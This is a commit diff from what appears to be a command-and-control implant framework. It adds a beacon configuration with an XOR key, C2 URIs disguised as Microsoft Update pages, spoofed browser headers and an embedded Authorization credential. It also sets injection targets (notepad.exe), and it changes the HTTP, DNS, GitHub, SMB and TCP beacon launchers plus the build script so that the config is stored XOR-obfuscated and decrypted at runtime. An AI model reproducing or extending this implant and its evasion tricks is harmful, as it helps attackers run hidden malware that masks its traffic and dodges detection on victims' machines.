Beacons & Modules config

Author: maxdcb

beacon/beacon/BeaconConfig.json

@@ -0,0 +1,61 @@
+{
+    "DomainName": "",
+    "ExposedIp": "",
+    "xorKey": "dfsdgferhzdzxczevre5595485sdg",
+    "ListenerHttpConfig": {
+        "uri": [
+            "/MicrosoftUpdate/ShellEx/KB242742/default.aspx",
+            "/MicrosoftUpdate/ShellEx/KB242742/admin.aspx",
+            "/MicrosoftUpdate/ShellEx/KB242742/download.aspx"
+        ],
+        "client": {
+            "headers": {
+                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
+                "Connection": "Keep-Alive",
+                "Content-Type": "text/plain;charset=UTF-8",
+                "Content-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7",
+                "Authorization": "YWRtaW46c2RGSGVmODQvZkg3QWMtIQ==",
+                "Keep-Alive": "timeout=5, max=1000",
+                "Cookie": "PHPSESSID=298zf09hf012fh2; csrftoken=u32t4o3tb3gg43; _gat=1",
+                "Accept": "*/*",
+                "Sec-Ch-Ua": "\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\"",
+                "Sec-Ch-Ua-Platform": "Windows"
+            }
+        }
+    },
+    "ListenerHttpsConfig": {
+        "uri": [
+            "/MicrosoftUpdate/ShellEx/KB242742/default.aspx",
+            "/MicrosoftUpdate/ShellEx/KB242742/upload.aspx",
+            "/MicrosoftUpdate/ShellEx/KB242742/config.aspx"
+        ],
+        "client": {
+            "headers": {
+                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
+                "Connection": "Keep-Alive",
+                "Content-Type": "text/plain;charset=UTF-8",
+                "Content-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7",
+                "Authorization": "YWRtaW46c2RGSGVmODQvZkg3QWMtIQ==",
+                "Keep-Alive": "timeout=5, max=1000",
+                "Cookie": "PHPSESSID=298zf09hf012fh2; csrftoken=u32t4o3tb3gg43; _gat=1",
+                "Accept": "*/*",
+                "Sec-Ch-Ua": "\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\"",
+                "Sec-Ch-Ua-Platform": "Windows"
+            }
+        }
+    },
+    "ModulesConfig": {
+        "assemblyExec": {
+            "process": "notepad.exe",
+            "test": "test"
+        },
+        "inject": {
+            "process": "notepad.exe",
+            "test": "test"
+        },
+        "toto": {
+            "process": "test",
+            "test": "test"
+        }
+    }
+}

beacon/beacon/BeaconDnsLauncher.cpp

@@ -1,5 +1,7 @@
 #include "BeaconDns.hpp"
 
+#include "cryptDef.hpp"
+
 
 using namespace std;
 
@@ -14,8 +16,12 @@ int main(int argc, char* argv[])
 	if (argc > 2)
 		domain = argv[2];
 
+	std::string configDecrypt(std::begin(_EncryptedBeaconHttpConfig_), std::end(_EncryptedBeaconHttpConfig_));
+    std::string keyConfig(std::begin(_KeyConfig_), std::end(_KeyConfig_));
+    XOR(configDecrypt, keyConfig);
+
 	std::unique_ptr<Beacon> beacon;
-	beacon = make_unique<BeaconDns>(dnsServer, domain);
+	beacon = make_unique<BeaconDns>(configDecrypt, dnsServer, domain);
 
 	beacon->run();
 }

beacon/beacon/BeaconGithubLauncher.cpp

@@ -1,5 +1,7 @@
 #include "BeaconGithub.hpp"
 
+#include "cryptDef.hpp"
+
 
 using namespace std;
 
@@ -14,8 +16,12 @@ int main(int argc, char* argv[])
 	if (argc > 2)
 		token = argv[2];
 
+	std::string configDecrypt(std::begin(_EncryptedBeaconHttpConfig_), std::end(_EncryptedBeaconHttpConfig_));
+    std::string keyConfig(std::begin(_KeyConfig_), std::end(_KeyConfig_));
+    XOR(configDecrypt, keyConfig);
+
 	std::unique_ptr<Beacon> beacon;
-	beacon = make_unique<BeaconGithub>(project, token);
+	beacon = make_unique<BeaconGithub>(configDecrypt, project, token);
 
 	beacon->run();
 }

beacon/beacon/BeaconHttpLauncher.cpp

@@ -1,108 +1,9 @@
 #include "BeaconHttp.hpp"
 
-
-using namespace std;
+#include "cryptDef.hpp"
 
 
-// XOR encrypted at compile time, so don't appear in string
-// size of the config contained between () must be set in the compileTimeXOR template function
-constexpr std::string_view _BeaconHttpConfig_ = R"({
-    "ListenerHttpConfig": [
-        {
-            "uri": [
-                "/MicrosoftUpdate/ShellEx/KB242742/default.aspx",
-                "/MicrosoftUpdate/ShellEx/KB242742/admin.aspx",
-                "/MicrosoftUpdate/ShellEx/KB242742/download.aspx"
-            ],
-            "client": [
-                {
-                    "headers": [
-                        {
-                            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
-                        },
-                        {
-                            "Connection": "Keep-Alive"
-                        },
-                        {
-                            "Content-Type": "text/plain;charset=UTF-8"
-                        },
-                        {
-                            "Content-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7"
-                        },
-                        {
-                            "Authorization": "YWRtaW46c2RGSGVmODQvZkg3QWMtIQ=="
-                        },
-                        {
-                            "Keep-Alive": "timeout=5, max=1000"
-                        },
-                        {
-                            "Cookie": "PHPSESSID=298zf09hf012fh2; csrftoken=u32t4o3tb3gg43; _gat=1"
-                        },
-                        {
-                            "Accept": "*/*"
-                        },
-                        {
-                            "Sec-Ch-Ua": "\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\""
-                        },
-                        {
-                            "Sec-Ch-Ua-Platform": "Windows"
-                        }
-                    ]
-                }
-            ]
-        }
-    ],
-    "ListenerHttpsConfig": [
-        {
-            "uri": [
-                "/MicrosoftUpdate/ShellEx/KB242742/default.aspx",
-                "/MicrosoftUpdate/ShellEx/KB242742/upload.aspx",
-                "/MicrosoftUpdate/ShellEx/KB242742/config.aspx"
-            ],
-            "client": [
-                {
-                    "headers": [
-                        {
-                            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
-                        },
-                        {
-                            "Connection": "Keep-Alive"
-                        },
-                        {
-                            "Content-Type": "text/plain;charset=UTF-8"
-                        },
-                        {
-                            "Content-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7"
-                        },
-                        {
-                            "Authorization": "YWRtaW46c2RGSGVmODQvZkg3QWMtIQ=="
-                        },
-                        {
-                            "Keep-Alive": "timeout=5, max=1000"
-                        },
-                        {
-                            "Cookie": "PHPSESSID=298zf09hf012fh2; csrftoken=u32t4o3tb3gg43; _gat=1"
-                        },
-                        {
-                            "Accept": "*/*"
-                        },
-                        {
-                            "Sec-Ch-Ua": "\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\""
-                        },
-                        {
-                            "Sec-Ch-Ua-Platform": "Windows"
-                        }
-                    ]
-                }
-            ]
-        }
-    ]
-})";
-
-constexpr std::string_view keyConfig = ".CRT$XCL";
-
-// compile time encryption of http configuration
-constexpr std::array<char, 3564> _EncryptedBeaconHttpConfig_ = compileTimeXOR<3564, 8>(_BeaconHttpConfig_, keyConfig);
+using namespace std;
 
 
 int main(int argc, char* argv[])
@@ -125,10 +26,9 @@ int main(int argc, char* argv[])
 			https=false;
 	}
 
-	// decrypt HttpConfig
     std::string configDecrypt(std::begin(_EncryptedBeaconHttpConfig_), std::end(_EncryptedBeaconHttpConfig_));
-    std::string key(keyConfig);
-    XOR(configDecrypt, key);
+    std::string keyConfig(std::begin(_KeyConfig_), std::end(_KeyConfig_));
+    XOR(configDecrypt, keyConfig);
 
 	std::unique_ptr<Beacon> beacon;
 	beacon = make_unique<BeaconHttp>(configDecrypt, ip, port, https);
@@ -171,10 +71,9 @@ extern "C" __declspec(dllexport) int go(PCHAR argv)
 		if(sHttps=="https")
 			https=true;
 
-        // decrypt HttpConfig
-		std::string configDecrypt(std::begin(_EncryptedBeaconHttpConfig_), std::end(_EncryptedBeaconHttpConfig_));
-		std::string key(keyConfig);
-		XOR(configDecrypt, key);
+        std::string configDecrypt(std::begin(_EncryptedBeaconHttpConfig_), std::end(_EncryptedBeaconHttpConfig_));
+        std::string keyConfig(std::begin(_KeyConfig_), std::end(_KeyConfig_));
+        XOR(configDecrypt, keyConfig);
 
 		std::unique_ptr<Beacon> beacon;
 		beacon = make_unique<BeaconHttp>(configDecrypt, ip, port, https);

beacon/beacon/BeaconSmbLauncher.cpp

@@ -1,5 +1,7 @@
 #include "BeaconSmb.hpp"
 
+#include "cryptDef.hpp"
+
 
 using namespace std;
 
@@ -10,8 +12,12 @@ int main(int argc, char* argv[])
 	if(argc > 1)
 		pipeName = argv[1];
 
+	std::string configDecrypt(std::begin(_EncryptedBeaconHttpConfig_), std::end(_EncryptedBeaconHttpConfig_));
+    std::string keyConfig(std::begin(_KeyConfig_), std::end(_KeyConfig_));
+    XOR(configDecrypt, keyConfig);
+
 	std::unique_ptr<Beacon> beacon;
-	beacon = make_unique<BeaconSmb>(pipeName);
+	beacon = make_unique<BeaconSmb>(configDecrypt, pipeName);
 
 	beacon->run();
 }

beacon/beacon/BeaconTcpLauncher.cpp

@@ -1,5 +1,7 @@
 #include "BeaconTcp.hpp"
 
+#include "cryptDef.hpp"
+
 
 using namespace std;
 
@@ -14,8 +16,12 @@ int main(int argc, char* argv[])
 	if (argc > 2)
 		port = atoi(argv[2]);
 
+	std::string configDecrypt(std::begin(_EncryptedBeaconHttpConfig_), std::end(_EncryptedBeaconHttpConfig_));
+    std::string keyConfig(std::begin(_KeyConfig_), std::end(_KeyConfig_));
+    XOR(configDecrypt, keyConfig);
+
 	std::unique_ptr<Beacon> beacon;
-	beacon = make_unique<BeaconTcp>(ip, port);
+	beacon = make_unique<BeaconTcp>(configDecrypt, ip, port);
 
 	beacon->run();
 }

beacon/beacon/CMakeLists.txt

@@ -1,7 +1,23 @@
+find_package(PythonInterp)
+find_package(Python)
+
+set(PYTHON_SCRIPT "${CMAKE_SOURCE_DIR}//beacon/beacon/handleConfig.py")
+set(GENERATED_HEADER "${CMAKE_BINARY_DIR}/cryptDef.hpp")
+add_custom_command(
+    OUTPUT ${GENERATED_HEADER}
+    COMMAND ${PYTHON_EXECUTABLE} ${PYTHON_SCRIPT} -o ${GENERATED_HEADER} 
+    COMMENT "Generating header.hpp using handleConfig.py"
+    VERBATIM
+)
+add_custom_target(HandleConfig ALL DEPENDS ${GENERATED_HEADER})
+include_directories(${CMAKE_BINARY_DIR})
+
+
 set(SOURCES_BEACON_HTTP_LAUNCHER
 	BeaconHttpLauncher.cpp
 )
-add_executable(BeaconHttp ${SOURCES_BEACON_HTTP_LAUNCHER} project.rc)
+add_executable(BeaconHttp ${SOURCES_BEACON_HTTP_LAUNCHER} project.rc ${GENERATED_HEADER})
+add_dependencies(BeaconHttp HandleConfig)
 set_property(TARGET BeaconHttp PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded")
 target_link_libraries(BeaconHttp BeaconHttpLib)
 add_custom_command(TARGET BeaconHttp POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 
@@ -38,7 +54,6 @@ add_custom_command(TARGET BeaconSmb POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy
 $<TARGET_FILE:BeaconSmb> "${CMAKE_SOURCE_DIR}/Release/Beacons/$<TARGET_FILE_NAME:BeaconSmb>")
 
 
-
 set(SOURCES_BEACON_DNS_LAUNCHER
 	BeaconDnsLauncher.cpp
 )

beacon/beacon/clearDef.h

@@ -0,0 +1,4 @@
+#pragma once
+
+char _EncryptedBeaconHttpConfig_[] = CONFIG;
+char _KeyConfig_[] = KEY_XOR;